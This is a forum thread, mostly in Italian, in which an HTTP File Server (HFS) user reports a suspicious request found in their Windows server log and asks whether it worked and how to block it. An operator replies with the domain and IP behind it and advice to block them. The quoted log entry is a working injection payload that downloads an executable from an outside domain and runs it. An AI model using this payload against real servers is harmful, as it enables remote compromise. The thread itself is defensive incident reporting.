Author Topic: Probabile tentativo di eseguire comandi da remoto  (Read 549 times)

0 Members and 1 Guest are viewing this topic.

Offline _KrustY_

  • Occasional poster
  • *
  • Posts: 2
    • View Profile
Probabile tentativo di eseguire comandi da remoto
« on: January 16, 2018, 12:02:41 PM »
BuonGiorno
uso da tempo HFS su un server dedicato con Windows server 2012
tengo sempre aggiornato HFS, ora ho la 2.3k
2 giorni fa ho trovato nel log questi comandi

Requested GET /?search=> Set Shell = CreateObject("Wscript.Shell")
> Post.Open "GET","http://yamanbeisi.com/server.exe%22,0
> Post.Send()
> Set aGet = CreateObject("ADODB.Stream")
> aGet.Mode = 3
> aGet.Type = 1
> aGet.Open()
> aGet.Write(Post.responseBody)
> aGet.SaveToFile "c:\server.exe",2
> wscript.sleep 1000
> Shell.Run ("c:\server.exe").}

Ho cercato il file server.exe in c: ma non c'è e non è nemmeno aperto come processo
Vorrei capire se questo tentativo di esecuzione del file è andato a buon fine e se è possibile bloccare qualsiasi richiesta di esecuzione di script o comandi shell

Grazie

Offline Mars

  • Operator
  • Insane poster
  • *****
  • Posts: 1802
    • View Profile
Re: Probabile tentativo di eseguire comandi da remoto
« Reply #1 on: January 17, 2018, 12:28:02 PM »
Certainly, this is an attempt to hack the server

the request included in the script come from china

Domain:       yamanbeisi.com
IP Address:       103.27.208.67
Region:       Chengdu (CN)

the file contains the following schema TR.Crypt.Xpack.srkhd

look at this report
http://r.virscan.org/report/eb5138fac75c231d89b69d93612310f2

the best thing to do is to have a good antivirus always updated, and to block the domain name of the link as well as the associated ip
« Last Edit: January 17, 2018, 01:04:29 PM by Mars »
FRENCH MEMBER : Si vous comprenez la langue française,  n'hésitez pas à l'utiliser pour une meilleure aide de ma part

Offline _KrustY_

  • Occasional poster
  • *
  • Posts: 2
    • View Profile
Re: Probabile tentativo di eseguire comandi da remoto
« Reply #2 on: January 23, 2018, 10:43:35 AM »
Ok Grazie Mars

Vorrei capire se c'è il modo di bloccare qualsiasi richiesta di esecuzione di script o comandi shell in HFS

Grazie
Ciaoo

Offline Mars

  • Operator
  • Insane poster
  • *****
  • Posts: 1802
    • View Profile
Re: Probabile tentativo di eseguire comandi da remoto
« Reply #3 on: January 23, 2018, 12:24:47 PM »
tradotto con google tanslate:

hfs è teoricamente protetto per non eseguire comandi come la macro del modello {. ... .}, potrebbero esserci varianti che non sono mai state testate o segnalate per rejetto. Dovresti avere la riga di comando completa del tentativo fraudolento di analizzare gli effetti, se non hai trovato una traccia di un programma, è che probabilmente il tentativo è fallito.

cosa fare mentre si attende che rejetto diventi consapevole della propria avventura è registrare il server di hosting in una lista di ban, così come l'indirizzo ip corrispondente in un firewall
FRENCH MEMBER : Si vous comprenez la langue française,  n'hésitez pas à l'utiliser pour une meilleure aide de ma part